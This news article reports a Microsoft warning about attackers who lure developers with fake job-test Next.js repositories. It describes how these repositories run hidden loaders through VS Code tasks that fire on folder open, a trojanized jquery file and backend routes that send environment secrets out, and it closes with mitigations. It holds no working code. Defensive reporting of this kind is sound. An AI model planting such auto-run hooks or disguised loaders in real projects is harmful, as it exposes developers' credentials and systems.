Microsoft has issued a stark warning to software developers regarding a sophisticated and coordinated attack campaign targeting them through malicious repositories masquerading as legitimate Next.js projects and technical assessment materials. Attackers are employing job-themed lures, presenting fake recruitment challenges to entice developers into cloning and executing potentially harmful code on their personal and corporate machines. This tactic, if successful, allows hackers to gain remote access to sensitive developer systems and the valuable data they contain.
The campaign came to light when security analysts observed suspicious outbound network connections from Node.js processes on affected developer machines, repeatedly reaching out to known command-and-control (C2) IP addresses. These network anomalies prompted a deeper investigation, correlating the network traffic with process telemetry. This analysis traced the execution back to malicious repositories, including one on Bitbucket presented as a recruiting technical assessment and another identified by the naming convention “Cryptan-Platform-MVP1.” Microsoft Defender Experts and their Security Research Team subsequently identified a larger collection of related repositories using shared code structures, loader logic, and naming patterns.
Microsoft Warns of Hackers Attacking Developers with Malicious Next.js Repositories
The observed repositories fall into several families, including “Cryptan,” “JP-soccer,” “RoyalJapan,” and “SettleMint,” often featuring near-duplicate variants labeled with common terms like v1, master, demo, platform, and server. This consistent structuring aided researchers in discovering additional repositories that, while not directly observed in initial telemetry, exhibited the same malicious execution logic and staging infrastructure. The sheer scale of this campaign poses a significant threat, particularly to development teams operating within corporate environments.
Developer machines are prime targets due to their privileged access to highly valuable assets such as source code, environment secrets, cloud API keys, database credentials, and critical build pipelines. When untrusted code is executed on such a machine, a single compromise can rapidly escalate, extending beyond the individual endpoint and potentially exposing an organization’s entire digital infrastructure. This method represents a calculated evolution in how threat actors approach software supply chain attacks, embedding malicious intent within seemingly legitimate development workflows.
Three Entry Points, One Shared Backdoor
Regardless of the initial entry point, all three execution paths identified in this campaign converge on a single outcome: the runtime retrieval and in-memory execution of attacker-controlled JavaScript. This shared backdoor is a key feature of the operation.
Visual Studio Code Workspace Automation Abuse
The first entry point exploits Visual Studio Code’s workspace automation features. When a developer opens and trusts a project folder containing a malicious configuration, the `.vscode/tasks.json` file is pre-armed with `runOn: “folderOpen,”`. This setting immediately triggers a Node.js script programmed to fetch a JavaScript loader from a Vercel-hosted staging endpoint. Upon execution, this script initiates communication with attacker-controlled infrastructure.
Development Server Execution
The second pathway is activated when a developer initiates the development server using `npm run dev`. In this scenario, trojanized assets, such as a modified `jquery.min.js` file, are designed to decode a base64-encoded URL. This decoded URL then leads to the retrieval of the same JavaScript loader from the Vercel staging endpoint, mirroring the first attack vector.
Backend Server Startup Exploitation
The third and final observed entry point occurs during the backend server startup process. Here, malicious backend routes are configured to decode a hidden base64 endpoint found within a `.env` file. Once extracted, this endpoint is used to transmit the entire process environment—including sensitive cloud API keys and access tokens—directly to the attackers. Subsequently, attacker-supplied JavaScript is executed through dynamic compilation.
Once any of these initial stages are successfully triggered, a lightweight Stage 1 payload takes over. This payload’s primary function is to profile the compromised host and then begin polling the C2 server at regular intervals. Following this, Stage 2 assumes control, enabling persistent operator-driven tasking. This includes functionalities such as directory browsing, the collection of sensitive files, and the staged uploading of exfiltrated data back to the attacker’s infrastructure.
To mitigate these threats, developers are strongly advised to enable Visual Studio Code’s Workspace Trust and Restricted Mode, which can prevent automatic code execution in untrusted folders. Organizations should implement attack surface reduction rules to block obfuscated script execution, enforce robust multi-factor authentication and conditional access policies for developer accounts, and strictly avoid storing production credentials on development machines. Security teams need to actively monitor for unusual Node.js outbound connections, utilizing tools like DeviceNetworkEvents and DeviceProcessEvents for hunting queries, and conduct thorough identity risk triage whenever a developer endpoint compromise is suspected.
Looking ahead, the focus will be on the continued evolution of these supply chain attack methods and the effectiveness of preventative measures deployed by both developers and organizations. Developers and security professionals will need to remain vigilant, adapting their defenses as attackers refine their techniques.